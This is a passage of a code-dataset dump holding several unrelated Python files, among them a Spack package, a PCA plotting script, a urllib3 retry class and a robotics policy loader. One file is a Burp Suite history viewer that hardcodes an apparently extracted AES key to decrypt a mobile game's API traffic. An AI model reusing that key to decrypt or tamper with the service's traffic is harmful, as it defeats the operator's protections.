It is written in Python and contains modules\n for a large number of common bioinformatics tools.\"\"\"\n\n homepage = \"https://multiqc.info\"\n pypi = \"multiqc/multiqc-1.0.tar.gz\"\n\n version(\"1.15\", sha256=\"ce5359a12226cf4ce372c6fdad142cfe2ae7501ffa97ac7aab544ced4db5ea3c\")\n version(\"1.14\", sha256=\"dcbba405f0c9521ed2bbd7e8f7a9200643047311c9619878b81d167300149362\")\n version(\"1.13\", sha256=\"0564fb0f894e6ca0822a0f860941b3ed2c33dce407395ac0c2103775d45cbfa0\")\n version(\"1.7\", sha256=\"02e6a7fac7cd9ed036dcc6c92b8f8bcacbd28983ba6be53afb35e08868bd2d68\")\n version(\"1.5\", sha256=\"fe0ffd2b0d1067365ba4e54ae8991f2f779c7c684b037549b617020ea883310a\")\n version(\"1.3\", sha256=\"cde17845680131e16521ace04235bb9496c78c44cdc7b5a0fb6fd93f4ad7a13b\")\n version(\"1.0\", sha256=\"1a49331a3d3f2e591a6e9902bc99b16e9205731f0cd2d6eaeee0da3d0f0664c9\")\n\n depends_on(\"python@2.7:\", when=\"@:1.7\", type=(\"build\", \"run\"))\n depends_on(\"python@3:\", when=\"@1.9:\", type=(\"build\", \"run\"))\n depends_on(\"py-setuptools\", type=\"build\")\n depends_on(\"py-matplotlib@2.1.1:\", type=(\"build\", \"run\"), when=\"@1.13:\")\n depends_on(\"py-matplotlib@2.1.1:2\", type=(\"build\", \"run\"), when=\"@1.7\")\n depends_on(\"py-matplotlib@:2.1.0\", type=(\"build\", \"run\"), when=\"@1.5\")\n depends_on(\"py-matplotlib\", type=(\"build\", \"run\"), when=\"@:1.3\")\n depends_on(\"py-networkx@2.5.1:\", type=(\"build\", \"run\"), when=\"@1.13:\")\n depends_on(\"py-networkx@:1\", type=(\"build\", \"run\"), when=\"@1.3\")\n depends_on(\"py-numpy\", type=(\"build\", \"run\"))\n depends_on(\"py-click\", type=(\"build\", \"run\"))\n depends_on(\"py-coloredlogs\", type=(\"build\", \"run\"), when=\"@1.13:\")\n depends_on(\"py-future@0.14.1:\", type=(\"build\", \"run\"))\n depends_on(\"py-jinja2@3.0.0:\", type=(\"build\", \"run\"), when=\"@1.14:\")\n depends_on(\"py-jinja2@2.9:\", type=(\"build\", \"run\"), when=\"@:1.13\")\n depends_on(\"py-lzstring\", type=(\"build\", \"run\"))\n depends_on(\"py-markdown\", type=(\"build\", \"run\"), when=\"@1.3:\")\n depends_on(\"py-pyyaml\", type=(\"build\", \"run\"))\n depends_on(\"py-pyyaml@4:\", type=(\"build\", \"run\"), when=\"@1.13:\")\n depends_on(\"py-requests\", type=(\"build\", \"run\"), when=\"@1.3:\")\n depends_on(\"py-rich@10:\", type=(\"build\", \"run\"), when=\"@1.13:\")\n depends_on(\"py-rich-click\", type=(\"build\", \"run\"), when=\"@1.13:\")\n depends_on(\"py-simplejson\", type=(\"build\", \"run\"))\n depends_on(\"py-spectra@0.0.10:\", type=(\"build\", \"run\"), when=\"@1.5:\")\n depends_on(\"py-spectra\", type=(\"build\", \"run\"))\n","repo_name":"spack/spack","sub_path":"var/spack/repos/builtin/packages/py-multiqc/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":3712,"dataset":"github-code","pt":"73"} +{"seq_id":"22557497269","text":"#!/usr/bin/python3\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import decomposition as dec\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\n\n\"\"\"\nCreates a PCA plot (principal component analysis).\n\"\"\"\n\ndf_initial = pd.read_csv(snakemake.input.df, sep='\\t')\ndf_copy = df_initial.copy()\ny = df_initial['label']\n\n# First the CV vs total_train split\nX_total_train, X_cv, y_total_train, y_cv = train_test_split(df_initial, y, test_size=0.15,\n random_state=42, stratify=y)\n\n# Next the total_train is split into train and test 
sets (1077 and 232 correspond\n# to the number of examples in train and test sets respectively to get an\n# approximately 70 % and 15 % of all examples in these two datasets)\nX_train, X_test, y_train, y_test = train_test_split(X_total_train, y_total_train,\n test_size=232, train_size=1077, random_state=42,\n stratify=y_total_train)\n\n\nX = df_initial.drop(['label', 'gene_id_sno'], axis=1)\nX_test_copy = X_test.copy()\nX_test_copy = X_test_copy.drop(['label', 'gene_id_sno'], axis=1)\n\n\n# Normalize data for PCA\nval = X.values\nnorm_val = StandardScaler().fit_transform(val)\n\nval_test = X_test_copy.values\nnorm_val_test = StandardScaler().fit_transform(val_test)\n\n\n# Create PCA analysis with 2 principal components for all snoRNAs\npca_all = dec.PCA(n_components=2, random_state=42)\nprincipal_components_all = pca_all.fit_transform(norm_val)\nprincipal_df_all = pd.DataFrame(data=principal_components_all, columns=['Principal_component_1', 'Principal_component_2'])\nprint('Explained variation per principal component: {}'.format(pca_all.explained_variance_ratio_)) # returns the proportion of variance explained by each component\nprint('For each component, the proportion of each columns composing the component is: {}'.format(pca_all.components_)) # returns an array of the proportion that each column contributes per component;\n\n# Create PCA analysis with 2 principal components for snoRNAs in test set only\npca_test = dec.PCA(n_components=2, random_state=42)\nprincipal_components_test = pca_test.fit_transform(norm_val_test)\nprincipal_df_test = pd.DataFrame(data=principal_components_test, columns=['Principal_component_1', 'Principal_component_2'])\nprint('Explained variation per principal component: {}'.format(pca_test.explained_variance_ratio_))\nprint('For each component, the proportion of each columns composing the component is: {}'.format(pca_test.components_))\n\n\n# Create the (pca) scatter plot for all snoRNAs\npc1_all = round(pca_all.explained_variance_ratio_[0] * 100, 2)\npc2_all = round(pca_all.explained_variance_ratio_[1] * 100, 2)\n\nplt.rcParams['svg.fonttype'] = 'none'\nfig, ax = plt.subplots(1, 1, figsize=(15, 15))\nplt.xticks(fontsize=14)\nplt.yticks(fontsize=14)\nax.set_xlabel(f'Principal Component 1 ({pc1_all} %)', fontsize=15)\nax.set_ylabel(f'Principal Component 2 ({pc2_all} %)', fontsize=15)\nprincipal_df2_all = pd.concat([principal_df_all, df_copy[['label', 'intergenic']]], axis=1)\nprincipal_df2_all['label'] = principal_df2_all['label'].replace([0, 1], ['not_expressed', 'expressed'])\nprincipal_df2_all['intergenic'] = principal_df2_all['intergenic'].replace([0, 1], ['intronic', 'intergenic'])\n\ncrits = list(snakemake.params.colors_dict.keys())\ncolors = list(snakemake.params.colors_dict.values())\n\n# Plot each hue separately on the same ax\nfor crit, color in zip(crits, colors):\n indicesToKeep = principal_df2_all[snakemake.wildcards.pca_hue] == crit\n ax.scatter(principal_df2_all.loc[indicesToKeep, 'Principal_component_1'],\n principal_df2_all.loc[indicesToKeep, 'Principal_component_2'],\n c=color, s=50)\n\nplt.legend(crits, prop={'size': 15})\nplt.savefig(snakemake.output.pca_all, dpi=600)\n\n\n# Create the (pca) scatter plot for snoRNAs in test set only\npc1_test = round(pca_test.explained_variance_ratio_[0] * 100, 2)\npc2_test = round(pca_test.explained_variance_ratio_[1] * 100, 2)\n\nplt.rcParams['svg.fonttype'] = 'none'\nfig2, ax2 = plt.subplots(1, 1, figsize=(15, 15))\nplt.xticks(fontsize=14)\nplt.yticks(fontsize=14)\nax2.set_xlabel(f'Principal Component 1 
({pc1_test} %)', fontsize=15)\nax2.set_ylabel(f'Principal Component 2 ({pc2_test} %)', fontsize=15)\nprincipal_df2_test = pd.concat([principal_df_test, X_test[['label', 'intergenic']].reset_index()], axis=1)\nprincipal_df2_test['label'] = principal_df2_test['label'].replace([0, 1], ['not_expressed', 'expressed'])\nprincipal_df2_test['intergenic'] = principal_df2_test['intergenic'].replace([0, 1], ['intronic', 'intergenic'])\n\ncrits = list(snakemake.params.colors_dict.keys())\ncolors = list(snakemake.params.colors_dict.values())\n\n\n# Plot each hue separately on the same ax\nfor crit, color in zip(crits, colors):\n indicesToKeep = principal_df2_test[snakemake.wildcards.pca_hue] == crit\n ax2.scatter(principal_df2_test.loc[indicesToKeep, 'Principal_component_1'],\n principal_df2_test.loc[indicesToKeep, 'Principal_component_2'],\n c=color, s=50)\n\nplt.legend(crits, prop={'size': 15})\nplt.savefig(snakemake.output.pca_test, dpi=600)\n","repo_name":"etiennefc/Abundance_determinants_snoRNA","sub_path":"scripts/python/graphs/PCA.py","file_name":"PCA.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"74278701036","text":"import math\n\n\ndef main(y):\n if y < 8:\n return 1 + 97 * pow(y, 4)\n elif 8 <= y < 94:\n return pow(y, 7)\n elif 94 <= y < 125:\n return pow(math.log(y), 6)\n else:\n return pow(y, 3) + 44 * (pow(y, 4) + pow(y, 5))\n\n\nif __name__ == \"__main__\":\n print(main(26))\n","repo_name":"lebeDEV02/mirea-python","sub_path":"eight-funcitons/second-function.py","file_name":"second-function.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"27483021768","text":"import gzip\nimport json\nimport os\nfrom base64 import b64decode\nfrom tkinter.filedialog import askdirectory, askopenfilename\nfrom xml.etree import ElementTree as ET\n\nimport glfw\nimport imgui\nimport OpenGL.GL as gl\nfrom Crypto.Cipher import AES\nfrom Crypto.Util.Padding import unpad\nfrom imgui.integrations.glfw import GlfwRenderer\n\nkey = b'do8PxbqYKV7cexTrt4J3fmgBtXXzu+dP'\niv = b'\\x00' * 16\n\nids = []\nmethods = []\nrequests = []\nresponses = []\nselected_id = -1\nfilter_text = ''\n\nrequest_data = ''\nrequest_raw = ''\nrequest_json = ''\nresponse_data = ''\nresponse_raw = ''\nresponse_json = ''\nrequest_json_min = False\nresponse_json_min = False\n\ndef decrypt_request(data):\n cipher = AES.new(key, AES.MODE_CBC, iv=iv)\n data = unpad(cipher.decrypt(b64decode(data, b'-_')), 16)\n data = bytearray(data)[16:]\n return json.loads(data)\n\ndef decrypt_response(data):\n cipher = AES.new(key, AES.MODE_CBC, iv=iv)\n data = unpad(cipher.decrypt(b64decode(data, b'-_')), 16)\n data = gzip.decompress(bytearray(data)[16:])\n return json.loads(data)\n\ndef load_file(filename, reset=True):\n global ids, methods, requests, responses, selected_id\n if not filename:\n return\n if reset:\n ids = []\n methods = []\n requests = []\n responses = []\n selected_id = -1\n update_data()\n try:\n tree = ET.parse(filename)\n root = tree.getroot()\n for item in root:\n host = item.find('host').text\n if 'appspot.com' in host and 'webview' not in host:\n request = b64decode(item.find('request').text).decode('utf-8')\n response = b64decode(item.find('response').text).decode('utf-8')\n methods.append(item.find('path').text)\n requests.append(request)\n responses.append(response)\n ids = [n for n in range(len(methods))]\n except:\n 
pass\n\ndef load_folder(directory):\n global ids, methods, requests, responses, selected_id\n if not directory:\n return\n ids = []\n methods = []\n requests = []\n responses = []\n selected_id = -1\n update_data()\n for root, dirs, files in os.walk(directory):\n for name in files:\n load_file(os.path.join(root, name), reset=False)\n\ndef update_data():\n global ids, requests, responses, selected_id\n global request_header, request_raw, request_json\n global response_header, response_raw, response_json\n global request_json_min, response_json_min\n \n if selected_id in ids:\n request = requests[selected_id].splitlines()\n request_header = '\\n'.join(request[:-1])\n request_raw = request[-1]\n if request_json_min:\n request_json = json.dumps(\n decrypt_request(request_raw), ensure_ascii=False,\n separators=(',', ':')\n )\n else:\n request_json = json.dumps(\n decrypt_request(request_raw), ensure_ascii=False, indent=4\n )\n response = responses[selected_id].splitlines()\n response_header = '\\n'.join(response[:-1])\n response_raw = response[-1]\n if response_json_min:\n response_json = json.dumps(\n decrypt_response(response_raw), ensure_ascii=False,\n separators=(',', ':')\n )\n else:\n response_json = json.dumps(\n decrypt_response(response_raw), ensure_ascii=False, indent=4\n )\n else:\n request_header = request_raw = request_json = ''\n response_header = response_raw = response_json = ''\n\ndef main():\n global ids, methods, requests, responses, selected_id, filter_text\n global request_header, request_raw, request_json\n global response_header, response_raw, response_json\n global request_json_min, response_json_min\n\n imgui.create_context()\n window = impl_glfw_init()\n impl = GlfwRenderer(window)\n\n io = impl.io\n io.fonts.clear()\n io.fonts.add_font_from_file_ttf(\n 'fonts/Roboto-Medium.ttf', 24,\n io.fonts.get_glyph_ranges_latin()\n )\n tc_font = io.fonts.add_font_from_file_ttf(\n 'fonts/NotoSansTC-Medium.otf', 24,\n io.fonts.get_glyph_ranges_chinese_full()\n )\n impl.refresh_font_texture()\n\n while not glfw.window_should_close(window):\n glfw.poll_events()\n impl.process_inputs()\n\n imgui.new_frame()\n\n imgui.set_next_window_position(0, 0)\n imgui.set_next_window_size(io.display_size.x, io.display_size.y)\n imgui.begin('', flags=imgui.WINDOW_NO_TITLE_BAR | imgui.WINDOW_MENU_BAR)\n\n if imgui.begin_menu_bar():\n if imgui.begin_menu(\"File\", True):\n clicked_open_file, _ = imgui.menu_item('Open File')\n if clicked_open_file:\n load_file(askopenfilename())\n clicked_open_folder, _ = imgui.menu_item('Open Folder')\n if clicked_open_folder:\n load_folder(askdirectory())\n clicked_quit, _ = imgui.menu_item('Quit')\n if clicked_quit:\n exit(1)\n imgui.end_menu()\n imgui.end_menu_bar()\n\n imgui.columns(3, border=False)\n\n imgui.begin_child('methods')\n _, filter_text = imgui.input_text('##filter', filter_text, 256)\n imgui.columns(2, border=False)\n imgui.set_column_offset(1, 50)\n for i in ids:\n if filter_text not in methods[i]:\n continue\n clicked, _ = imgui.selectable(\n str(i), selected_id == i, imgui.SELECTABLE_SPAN_ALL_COLUMNS\n )\n if clicked:\n selected_id = i\n update_data()\n imgui.next_column()\n imgui.text(methods[i])\n imgui.next_column()\n imgui.columns(1)\n imgui.end_child()\n imgui.next_column()\n\n show_request_header, _ = imgui.collapsing_header('Request Header')\n if show_request_header:\n if imgui.button('Copy Request Header'):\n glfw.set_clipboard_string(None, request_header)\n imgui.input_text_multiline(\n '##request header', request_header, 
len(request_header) + 2,\n -1, flags=imgui.INPUT_TEXT_READ_ONLY\n )\n show_request_raw, _ = imgui.collapsing_header(\n 'Request Data (Raw, Encrypted)',\n flags=imgui.TREE_NODE_DEFAULT_OPEN\n )\n if show_request_raw:\n imgui.input_text(\n '##request raw', request_raw, len(request_raw) + 2,\n flags=imgui.INPUT_TEXT_READ_ONLY\n )\n imgui.same_line()\n if imgui.button('Copy Request Data (Raw)'):\n glfw.set_clipboard_string(None, request_raw)\n show_request_json, _ = imgui.collapsing_header(\n 'Request Data (JSON, Decrypted)',\n flags=imgui.TREE_NODE_DEFAULT_OPEN\n )\n if show_request_json: \n if imgui.radio_button('Minify Request JSON', request_json_min):\n request_json_min = not request_json_min\n update_data()\n imgui.same_line()\n if imgui.button('Copy Request Data (JSON)'):\n glfw.set_clipboard_string(None, request_json)\n with imgui.font(tc_font):\n imgui.input_text_multiline(\n '##request json', request_json,\n len(request_json.encode('utf-8')) + 2, -1, height=-1,\n flags=imgui.INPUT_TEXT_READ_ONLY\n )\n imgui.next_column()\n\n show_response_header, _ = imgui.collapsing_header('Response Header')\n if show_response_header:\n if imgui.button('Copy Response Header'):\n glfw.set_clipboard_string(None, response_header)\n imgui.input_text_multiline(\n '##response header', response_header, len(response_header) + 2,\n -1, flags=imgui.INPUT_TEXT_READ_ONLY\n )\n show_response_raw, _ = imgui.collapsing_header(\n 'Response Data (Raw, Encrypted)',\n flags=imgui.TREE_NODE_DEFAULT_OPEN\n )\n if show_response_raw:\n imgui.input_text(\n '##response raw', response_raw, len(response_raw) + 2,\n flags=imgui.INPUT_TEXT_READ_ONLY\n )\n imgui.same_line()\n if imgui.button('Copy Response Data (Raw)'):\n glfw.set_clipboard_string(None, response_raw)\n show_response_json, _ = imgui.collapsing_header(\n 'Response Data (JSON, Decrypted)',\n flags=imgui.TREE_NODE_DEFAULT_OPEN\n )\n if show_response_json: \n if imgui.radio_button('Minify Response JSON', response_json_min):\n response_json_min = not response_json_min\n update_data()\n imgui.same_line()\n if imgui.button('Copy Response Data (JSON)'):\n glfw.set_clipboard_string(None, response_json)\n with imgui.font(tc_font):\n imgui.input_text_multiline(\n '##response json', response_json,\n len(response_json.encode('utf-8')) + 2, -1, height=-1,\n flags=imgui.INPUT_TEXT_READ_ONLY\n )\n imgui.columns(1)\n imgui.end()\n\n gl.glClearColor(1., 1., 1., 1)\n gl.glClear(gl.GL_COLOR_BUFFER_BIT)\n\n imgui.render()\n impl.render(imgui.get_draw_data())\n glfw.swap_buffers(window)\n\n impl.shutdown()\n glfw.terminate()\n\n\ndef impl_glfw_init():\n width, height = 1920, 1000\n window_name = \"Burp Suite HTTP History Viewer for MLTD\"\n\n if not glfw.init():\n print(\"Could not initialize OpenGL context\")\n exit(1)\n\n # OS X supports only forward-compatible core profiles from 3.2\n glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 3)\n glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 3)\n glfw.window_hint(glfw.OPENGL_PROFILE, glfw.OPENGL_CORE_PROFILE)\n\n glfw.window_hint(glfw.OPENGL_FORWARD_COMPAT, gl.GL_TRUE)\n\n # Create a windowed mode window and its OpenGL context\n window = glfw.create_window(\n int(width), int(height), window_name, None, None\n )\n glfw.make_context_current(window)\n\n if not window:\n glfw.terminate()\n print(\"Could not initialize Window\")\n exit(1)\n\n return window\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"RainbowUnicorn7297/mltd-relive","sub_path":"tools/burp-viewer.py","file_name":"burp-viewer.py","file_ext":"py","file_size_in_byte":10469,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"73"} +{"seq_id":"26090126394","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\packages\\requests\\packages\\urllib3\\util\\retry.py\nfrom __future__ import absolute_import\nimport time\nimport logging\nfrom ..exceptions import ConnectTimeoutError, MaxRetryError, ProtocolError, ReadTimeoutError, ResponseError\nfrom ..packages import six\nlog = logging.getLogger(__name__)\n\nclass Retry(object):\n DEFAULT_METHOD_WHITELIST = frozenset(['HEAD',\n 'GET',\n 'PUT',\n 'DELETE',\n 'OPTIONS',\n 'TRACE'])\n BACKOFF_MAX = 120\n\n def __init__(self, total = 10, connect = None, read = None, redirect = None, method_whitelist = DEFAULT_METHOD_WHITELIST, status_forcelist = None, backoff_factor = 0, raise_on_redirect = True, raise_on_status = True, _observed_errors = 0):\n self.total = total\n self.connect = connect\n self.read = read\n if redirect is False or total is False:\n redirect = 0\n raise_on_redirect = False\n self.redirect = redirect\n self.status_forcelist = status_forcelist or set()\n self.method_whitelist = method_whitelist\n self.backoff_factor = backoff_factor\n self.raise_on_redirect = raise_on_redirect\n self.raise_on_status = raise_on_status\n self._observed_errors = _observed_errors\n\n def new(self, **kw):\n params = dict(total=self.total, connect=self.connect, read=self.read, redirect=self.redirect, method_whitelist=self.method_whitelist, status_forcelist=self.status_forcelist, backoff_factor=self.backoff_factor, raise_on_redirect=self.raise_on_redirect, raise_on_status=self.raise_on_status, _observed_errors=self._observed_errors)\n params.update(kw)\n return type(self)(**params)\n\n @classmethod\n def from_int(cls, retries, redirect = True, default = None):\n if retries is None:\n retries = default if default is not None else cls.DEFAULT\n if isinstance(retries, Retry):\n return retries\n redirect = bool(redirect) and None\n new_retries = cls(retries, redirect=redirect)\n log.debug('Converted retries value: %r -> %r', retries, new_retries)\n return new_retries\n\n def get_backoff_time(self):\n if self._observed_errors <= 1:\n return 0\n backoff_value = self.backoff_factor * 2 ** (self._observed_errors - 1)\n return min(self.BACKOFF_MAX, backoff_value)\n\n def sleep(self):\n backoff = self.get_backoff_time()\n if backoff <= 0:\n return\n time.sleep(backoff)\n\n def _is_connection_error(self, err):\n return isinstance(err, ConnectTimeoutError)\n\n def _is_read_error(self, err):\n return isinstance(err, (ReadTimeoutError, ProtocolError))\n\n def is_forced_retry(self, method, status_code):\n if self.method_whitelist and method.upper() not in self.method_whitelist:\n return False\n return self.status_forcelist and status_code in self.status_forcelist\n\n def is_exhausted(self):\n retry_counts = (self.total,\n self.connect,\n self.read,\n self.redirect)\n retry_counts = list(filter(None, retry_counts))\n if not retry_counts:\n return False\n return min(retry_counts) < 0\n\n def increment(self, method = None, url = None, response = None, error = None, _pool = None, _stacktrace = None):\n if self.total is False and error:\n raise six.reraise(type(error), error, _stacktrace)\n total = self.total\n if total is not None:\n total -= 1\n _observed_errors = self._observed_errors\n connect = 
self.connect\n read = self.read\n redirect = self.redirect\n cause = 'unknown'\n if error and self._is_connection_error(error):\n if connect is False:\n raise six.reraise(type(error), error, _stacktrace)\n elif connect is not None:\n connect -= 1\n _observed_errors += 1\n elif error and self._is_read_error(error):\n if read is False:\n raise six.reraise(type(error), error, _stacktrace)\n elif read is not None:\n read -= 1\n _observed_errors += 1\n elif response and response.get_redirect_location():\n if redirect is not None:\n redirect -= 1\n cause = 'too many redirects'\n else:\n _observed_errors += 1\n cause = ResponseError.GENERIC_ERROR\n if response and response.status:\n cause = ResponseError.SPECIFIC_ERROR.format(status_code=response.status)\n new_retry = self.new(total=total, connect=connect, read=read, redirect=redirect, _observed_errors=_observed_errors)\n if new_retry.is_exhausted():\n raise MaxRetryError(_pool, url, error or ResponseError(cause))\n log.debug(\"Incremented Retry for (url='%s'): %r\", url, new_retry)\n return new_retry\n\n def __repr__(self):\n return '{cls.__name__}(total={self.total}, connect={self.connect}, read={self.read}, redirect={self.redirect})'.format(cls=type(self), self=self)\n\n\nRetry.DEFAULT = Retry(3)\n","repo_name":"connoryang/1v1dec","sub_path":"requests/packages/urllib3/util/retry.py","file_name":"retry.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"10860508473","text":"import time\nimport joblib\nimport os\nimport os.path as osp\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nfrom spinup import EpochLogger\nfrom spinup.utils.logx import restore_tf_graph\n\nfrom robolearn_gym_envs.pybullet import CentauroTrayEnv\nfrom robolearn.envs.normalized_box_env import NormalizedBoxEnv\n\nTend = 10.0 # Seconds\n\nSIM_TIMESTEP = 0.01\nFRAME_SKIP = 1\nDT = SIM_TIMESTEP * FRAME_SKIP\n\nPATH_LENGTH = int(np.ceil(Tend / DT))\nPATHS_PER_EPOCH = 1\nPATHS_PER_EVAL = 2\nBATCH_SIZE = 128\n\nSEED = 1010\n# NP_THREADS = 6\n\nSUBTASK = None\n\n\ndef load_policy(fpath, itr='last', deterministic=False):\n # handle which epoch to load from\n if itr == 'last':\n saves = [int(x[11:])\n for x in os.listdir(fpath)\n if 'simple_save' in x and len(x) > 11]\n itr = '%d' % max(saves) if len(saves) > 0 else ''\n else:\n itr = '%d' % itr\n\n # load the things!\n sess = tf.Session()\n model = restore_tf_graph(sess, osp.join(fpath, 'simple_save'+itr))\n\n # get the correct op for executing actions\n if deterministic and 'mu' in model.keys():\n # 'deterministic' is only a valid option for SAC policies\n print('Using deterministic action op.')\n action_op = model['mu']\n else:\n print('Using default action op.')\n action_op = model['pi']\n\n # make function for producing an action given a single state\n get_action = lambda x: \\\n sess.run(action_op, feed_dict={model['x']: x[None, :]})[0]\n\n return get_action\n\n\ndef run_policy(env, policy, max_ep_len=None, num_episodes=100, render=True):\n\n logger = EpochLogger()\n obs, reward, done, ep_ret, ep_len, n = env.reset(), 0, False, 0, 0, 0\n while n < num_episodes:\n if render:\n env.render()\n time.sleep(1e-3)\n\n action = policy(obs)\n obs, reward, done, _ = env.step(action)\n ep_ret += reward\n ep_len += 1\n\n if done or (ep_len == max_ep_len):\n logger.store(EpRet=ep_ret, EpLen=ep_len)\n print('Episode %d \\t EpRet %.3f \\t EpLen %d' % (n, ep_ret, ep_len))\n obs, reward, done, 
ep_ret, ep_len = env.reset(), 0, False, 0, 0\n n += 1\n\n logger.log_tabular('EpRet', with_min_and_max=True)\n logger.log_tabular('EpLen', average_only=True)\n logger.dump_tabular()\n\n\ndef load_env(render=True):\n\n env_params = dict(\n is_render=True,\n # obs_distances=False,\n obs_distances=True,\n obs_with_img=False,\n # obs_with_ori=True,\n active_joints='RA',\n control_mode='joint_tasktorque',\n # _control_mode='torque',\n balance_cost_weight=1.0,\n fall_cost_weight=1.0,\n tgt_cost_weight=3.0,\n # tgt_cost_weight=50.0,\n balance_done_cost=0., # 2.0*PATH_LENGTH, # TODO: dont forget same balance weight\n tgt_done_reward=0., # 20.0,\n ctrl_cost_weight=1.0e-1,\n use_log_distances=True,\n log_alpha_pos=1e-4,\n log_alpha_ori=1e-4,\n goal_tolerance=0.05,\n min_obj_height=0.60,\n max_obj_height=1.20,\n max_obj_distance=0.20,\n max_time=None,\n sim_timestep=SIM_TIMESTEP,\n frame_skip=FRAME_SKIP,\n subtask=SUBTASK,\n random_init=True,\n seed=SEED,\n )\n\n env = NormalizedBoxEnv(\n CentauroTrayEnv(**env_params),\n # normalize_obs=True,\n normalize_obs=False,\n online_normalization=False,\n obs_mean=None,\n obs_var=None,\n obs_alpha=0.001,\n )\n\n return env\n\n\ndef main(args):\n policy = load_policy(args.dir, deterministic=args.deterministic)\n env = load_env(render=not args.norender)\n\n run_policy(env, policy, args.horizon, args.episodes, not args.norender)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('dir', type=str, default='.',\n help='path to the tf directory')\n parser.add_argument('--horizon', '-H', type=int, default=1000)\n parser.add_argument('--episodes', '-n', type=int, default=100)\n parser.add_argument('--deterministic', '-d', action='store_true')\n parser.add_argument('--norender', '-nr', action='store_true')\n args = parser.parse_args()\n\n main(args)\n input('Press a key to close script')\n","repo_name":"domingoesteban/robolearn","sub_path":"examples/rl_algos/spinningup/centauro/load_sac.py","file_name":"load_sac.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"34424902938","text":"from collections import defaultdict\nimport sys\n\nNUM_BUCKETS = 50\n\n\nclass DeadlineAssigner:\n def __init__(self, buckets):\n self.buckets = buckets\n\n @staticmethod\n def load_from_file(filename):\n num_packets_to_fct = defaultdict(list)\n\n with open(filename) as deadlines_file:\n for line in deadlines_file:\n num_packets, flow_duration, *_ = line.split()\n num_packets_to_fct[float(num_packets)].append(float(flow_duration))\n\n num_packets_fcts = sorted(num_packets_to_fct.items())\n num_total_flows = sum(len(fcts) for _, fcts in num_packets_fcts)\n\n min_flows_in_a_bucket = num_total_flows // NUM_BUCKETS\n\n buckets = []\n current_num_packets = None\n current_bucket = []\n for num_packets, fcts in num_packets_fcts:\n current_num_packets = num_packets\n current_bucket.extend(fcts)\n if len(current_bucket) >= min_flows_in_a_bucket:\n buckets.append((current_num_packets, max(current_bucket)))\n current_num_packets = None\n current_bucket = []\n\n if current_num_packets is not None:\n buckets.append((current_num_packets, max(current_bucket)))\n\n return DeadlineAssigner(buckets)\n\n def get_deadline(self, num_packets):\n i_upper = 0\n while i_upper < len(self.buckets) - 1 and self.buckets[i_upper][0] < num_packets:\n i_upper += 1\n return self.buckets[i_upper][1]\n\n\ndef count_satisfied_deadlines(deadline_assigner: DeadlineAssigner, 
flow_stat_filename: str):\n total = 0\n satisfied = 0\n with open(flow_stat_filename) as f:\n for line in f:\n num_packets, fct, *_ = line.strip().split()\n num_packets = float(num_packets)\n fct = float(fct)\n\n total += 1\n if fct <= deadline_assigner.get_deadline(num_packets):\n satisfied += 1\n\n print(f'{satisfied}/{total}')\n\n\nif __name__ == '__main__':\n ideal_deadlines_filename = sys.argv[1]\n flow_stat_filename = sys.argv[2]\n count_satisfied_deadlines(DeadlineAssigner.load_from_file(ideal_deadlines_filename), flow_stat_filename)\n\n\n\n\n\n\n","repo_name":"hotnets2019/submission","sub_path":"PIAS-NS2/scripts/analyze_deadlines.py","file_name":"analyze_deadlines.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"2376592720","text":"from . import (\n get_result,\n)\nimport pytest\n\n\n@pytest.mark.asyncio\n@pytest.mark.resolver_test_group(\"activate_root\")\n@pytest.mark.parametrize(\n (\"group_name\", \"root_id\"),\n (\n (\n \"group1\",\n \"63298a73-9dff-46cf-b42d-9b2f01a56690\",\n ),\n (\n \"group2\",\n \"83cadbdc-23f3-463a-9421-f50f8d0cb1e5\",\n ),\n (\n \"group2\",\n \"eee8b331-98b9-4e32-a3c7-ec22bd244ae8\",\n ),\n ),\n)\nasync def test_activate_root(\n populate: bool, group_name: str, root_id: str\n) -> None:\n assert populate\n result = await get_result(\n email=\"admin@gmail.com\", group_name=group_name, identifier=root_id\n )\n assert \"errors\" not in result\n assert result[\"data\"][\"activateRoot\"][\"success\"]\n\n\n@pytest.mark.asyncio\n@pytest.mark.resolver_test_group(\"activate_root\")\n@pytest.mark.parametrize(\n (\"group_name\", \"root_id\"),\n (\n (\n \"group2\",\n \"702b81b3-d741-4699-9173-ecbc30bfb0cb\",\n ),\n (\n \"group1\",\n \"44db9bee-c97d-4161-98c6-f124d7dc9a41\",\n ),\n (\n \"group1\",\n \"bd4e5e66-da26-4274-87ed-17de7c3bc2f1\",\n ),\n ),\n)\nasync def test_activate_root_fail(\n populate: bool,\n group_name: str,\n root_id: str,\n) -> None:\n assert populate\n result = await get_result(\n email=\"admin@gmail.com\", group_name=group_name, identifier=root_id\n )\n assert \"errors\" in result\n assert result[\"errors\"][0][\"message\"] == \"Access denied\"\n","repo_name":"cognettings/vulscanner","sub_path":"integrates/back/test/functional/src/activate_root/test_resolver.py","file_name":"test_resolver.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"36977104997","text":"filename = \"wimbledon.csv\"\n\n\ndef main():\n data = load_data()\n 